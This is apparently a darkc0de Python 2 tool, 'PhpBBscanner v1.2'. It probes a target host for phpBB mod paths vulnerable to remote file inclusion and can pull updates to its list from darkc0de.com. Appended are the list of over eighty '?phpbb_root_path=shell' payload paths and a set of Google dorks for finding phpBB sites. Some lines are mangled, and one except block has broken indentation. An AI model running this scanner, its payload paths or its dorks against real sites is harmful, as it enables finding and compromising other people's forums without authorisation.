#!/usr/bin/python
#This is a phpBB scanner, searches if vulnerable paths
#exist. Put phpvuln.txt in the dir
#at which you are running this script.
#Every path in phpvuln.txt has a vuln. or an exploit for it.
#(considering its the right version)

#Changelog v1.2 : added update function

#Changelog v1.1 : added verbose mode, changed http 
#response bug, added new vuln. paths

#http://www.darkc0de.com
##d3hydr8[at]gmail[dot]com

import sys, httplib, time, urllib2

def getserv(path):

    try:
        h = httplib.HTTP(host+":"+port)
        h.putrequest("HEAD", path)
        h.putheader("Host", host)
        h.endheaders()
        status, reason, headers = h.getreply()
    except: 
        print "\n[-] Error: Name or service not known. Check your host.\n"
        sys.exit(1)
    return status, reason, headers.get("Server")

def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

def title():
    print "\n\t   d3hydr8[at]gmail[dot]com PhpBBscanner v1.2"
    print "\t--------------------------------------------------"

def update():
    try:
        lines = open("phpvuln.txt", "r").readlines()
    except(IOError): 
         print "[-] Error: Check your phpvuln.txt path and permissions"
        print "[-] Update Failed\n"
        sys.exit(1)
    try:
        paths = urllib2.urlopen("http://www.darkc0de.com/scanners/phpvuln.txt").readlines()
    except:
        print "[-] Error: Couldn't connect to remote database"
        print "[-] Update Failed\n"
        sys.exit(1)
    if len(paths) > len(lines):
        dif = int(len(paths)-len(lines))
        print "[+] Found:",dif,"updates"
        print "\n[+] Writing Updates"
        file = open("phpvuln.txt", "a")
        for path in paths[-dif:]:
            if path[-1:] == "\n":
                path = path[:-1]
            print "[+] New:",path
            file.writelines(path+"\n")
        file.close()
        print "\n[+] Update Complete\n"
    else:
        print "[-] No Updates Available\n"
    sys.exit(1)

if len(sys.argv) >= 5 or len(sys.argv) == 1:
    title()
    print "\n\t[+] Usage: ./phpbbscan.py <host> <port>\n"
    print "\t[options]"
    print "\t   -v/-verbose : Shows all http requests and responses"
    print "\t   -u/-update : Updates phpvuln.txt with the latest"
    print "\n\t[+] Ex. ./phpbbscan.py -update"
    print "\t[+] Ex. ./phpbbscan.py google.com 80 -verbose\n"
    sys.exit(1)

title()

if sys.argv[1].lower() == "-u" or sys.argv[1].lower() == "-update":
    print "\n[+] Updating Database File"
    update()
    
host = sys.argv[1]
port = sys.argv[2]

for arg in sys.argv[1:]:
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
    else:
        verbose = 0

if host[:7] == "http://":
    host = host.replace("http://","")
if host[-1] == "/":
    host = host[:-1]
    
print "[+] Getting responses" 
okresp,reason,server = getserv("/")
badresp = getserv("/d3hydr8.html")[:1]

if okresp == badresp[0]:
    print "\n[-] Responses matched, try another host.\n"
    sys.exit(1)
else:
    print "\n[+] Target host:",host
    print "[+] Target port:",port
    print "[+] Target server:",server
    print "[+] Target OK response:",okresp
    print "[+] Target BAD response:",badresp[0], reason
    print "[+] Scan Started at",timer()
    if verbose ==1:
        print "\n[+] Verbose Mode On"

dirs = ["/","/bb/","/phpbb/","/forum/","/forums/","/phpBB2/","/phpbb/phpBB2/"]

try:
    lines = open("phpvuln.txt", "r").readlines()
    print "\n[+]",len(lines)*len(dirs),"paths loaded\n"
except(IOError): 
     print "[-] Error: Check your vulnerabilities list path\n"
    sys.exit(1)

vulns = []
print "[+] Scanning...\n" 
for d in dirs:
    for line in lines:
        status, reason = getserv(d+line[:-1])[:2]
        if verbose ==1:
            print "[+]",status,reason,":",d+line,"\n"
        if status == okresp:
            vulns.append(d+line)
            print "\t[!]",status,reason,":",d+line,"\n"
        if status == int(401):
            print "\t--",status,reason,":Needs Authentication [",d+line,"]\n"
        
if len(vulns) == 0:
    print "[-] Couldn't find any vuln. paths\n"
else:
    print "[!] Found",len(vulns),"possible vulnerabilities, check manually.\n"
    for vuln in vulns:
        print "\t[+] ",vuln
print "\n[+] Scan completed at", timer(),"\n"

/toplist.php?f=toplist_top10&phpbb_root_path=shell

/admin/addentry.php?phpbb_root_path=shell

/includes/kb_constants.php?module_root_path=shell

/auction/auction_common.php?phpbb_root_path=shell

/[phpraidpath]/auth/auth.php?phpbb_root_path=shell

/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=shell

/[phpraidpath]/auth/auth.php?smf_root_path=shell

/[phpraidpath]/auth/auth_SMF/smf_root_path=shell

/[pdbpath]/includes/pafiledb_constants.php?module_root_path=shell

/index.php?phpbb_root_path=shell

/song.php?phpbb_root_path=shell

/faq.php?phpbb_root_path=shell

/list.php?phpbb_root_path=shell

/gen_m3u.php?phpbb_root_path=shell

/playlist.php?phpbb_root_path=shell

/language/lang_english/lang_activity.php?phpbb_root_path=shell

/blend_data/blend_common.php?phpbb_root_path=shell

/stat_modules/users_age/module.php?phpbb_root_path=shell

/admin/admin_topic_action_logging.php?setmodules=attach&p hpbb_root_path=shell

/phpbb/getmsg.php?phpbb_root_path=shell

/includes/functions_cms.php?phpbb_root_path=shell

/m2f/m2f_forum.php?m2f_root_path=shell

/m2f/m2f_phpbb204.php?m2f_root_path=shell

/m2f/m2f_forum.php?m2f_root_path=shell

/m2f/m2f_mailinglist.php?m2f_root_path=shell

/m2f/m2f_cron.php?m2f_root_path=shell

/[roster_path]/lib/phpbb.php?subdir=shell

/includes/functions_mod_user.php?phpbb_root_path=shell

/includes/functions.php?phpbb_root_path=shell

/includes/functions_portal.php?phpbb_root_path=shell

/includes/functions_kb.php?phpbb_root_path=shell

/includes/bbcb_mg.php?phpbb_root_path=shell

/includes/functions.php?phpbb_root_path=shell

/includes/functions_admin.php?phpbb_root_path=shell

/admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=

/includes/functions_static_topics.php?phpbb_root_path=shell

/includes/logger_engine.php?phpbb_root_path=shell

/includes/themen_portal_mitte.php?phpbb_root_path=shell

/includes/logger_engine.php?phpbb_root_path=shell

/includes/functions.php?phpbb_root_path=shell

/includes/functions_user_viewed_posts.php?phpbb_root_path=shell

/includes/functions_num_image.php?phpbb_root_path=shell

/includes/functions_mod_user.php?phpbb_root_path=shell

/includes/functions_mod_user.php?phpbb_root_path=shell

/shoutbox.php?phpbb_root_path=shell

/root/includes/antispam.php?phpbb_root_path=shell

/mods/iai/includes/constants.php?phpbb_root_path=shell

/zufallscodepart.php?phpbb_root_path=shell

/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=shell

/lat2cyr.php?phpbb_root_path=shell

/admin/admin_spam.php?phpbb_root_path=shell

/functions_rpg_events.php?phpbb_root_path=shell

/includes/archive/archive_topic.php?phpbb_root_path=shell

/language/lang_french/lang_prillian_faq.php?phpbb_root_path=shell

/includes/functions_mod_user.php?phpbb_root_path=shell

/phpbb_security.php?phpbb_root_path=shell

/language/lang_english/lang_prillian_faq.php?phpbb_root_path=shell

/faq.php?foing_root_path=shell

/index.php?foing_root_path=shell

/list.php?foing_root_path=shell

/login.php?foing_root_path=shell

/playlist.php?foing_root_path=shell

/song.php?foing_root_path=shell

/view_artist.php?foing_root_path=shell

/view_song.php?foing_root_path=shell

/login.php?foing_root_path=shell

/playlist.php?foing_root_path=shell

/song.php?foing_root_path=shell

/flash/set_na.php?foing_root_path=shell

/flash/initialise.php?foing_root_path=shell

/flash/get_song.php?foing_root_path=shell

/includes/common.php?foing_root_path=shell

/admin/nav.php?foing_root_path=shell

/admin/main.php?foing_root_path=shell

/admin/list_artists.php?foing_root_path=shell

/admin/index.php?foing_root_path=shell

/admin/genres.php?foing_root_path=shell

/admin/edit_artist.php?foing_root_path=shell

/admin/edit_album.php?foing_root_path=shell

/admin/config.php?foing_root_path=shell

/admin/admin_status.php?foing_root_path=shell

Powered by phpBB 2

"Powered by phpBB"
Powered by phpBB

ext: php intext:"phpbb_installed"

"Powered by phpBB * 2002, 2006 phpBB Group" -demo

"2002, 2006 phpBB Group"
"phpBB Group"
phpbb 2

intext:"Powered by phpBB 2.0."

inurl:"index.php?sid="
inurl:"kb.php?mode=cat"
inurl:"templates""http://forum.xaknet.ru/images/" logo_phpBB.gif
inurl:/phpbb2/
inurl:/phpbb/

+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"
intext:"Powered by phpBB 2.0." inurl:"kb.php?mode=cat"

"Powered by phpBB" "2001, 2005 phpBB Group" inurl:index.php inurl:sid=
inurl:/install.php Welcome to phpBB
intext:"Powered by phpBB 2.0" -site:phpbb.com
intext:"Powered by phpBB 2.0" -site:phpbb.com -"2.0.11"
intitle:"Welcome.to.phpbb.*.installation"
filetype:php inurl:phpbb2 intext:Index -intext:2.0.13 -intext:2005
+intext:"* by phpBB ©"
"powered b" "y phpbb"
inurl:redirect=admin/index.php "Powered by phpBB"
inurl:admin/index.php "Powered" "phpBB"

"Powered by phpbb modified v1.8 by Przemo"
"Powered by" "v1.8 by Przemo"
"Powered by" "v1.8 by Przemo" -edu -demo -shoutbox
"Powered by" "v1.8 by Przemo" inurl:index.php -edu -demo -shoutbox 
"powered by PhpBB 2.0.15" -site:phpbb.com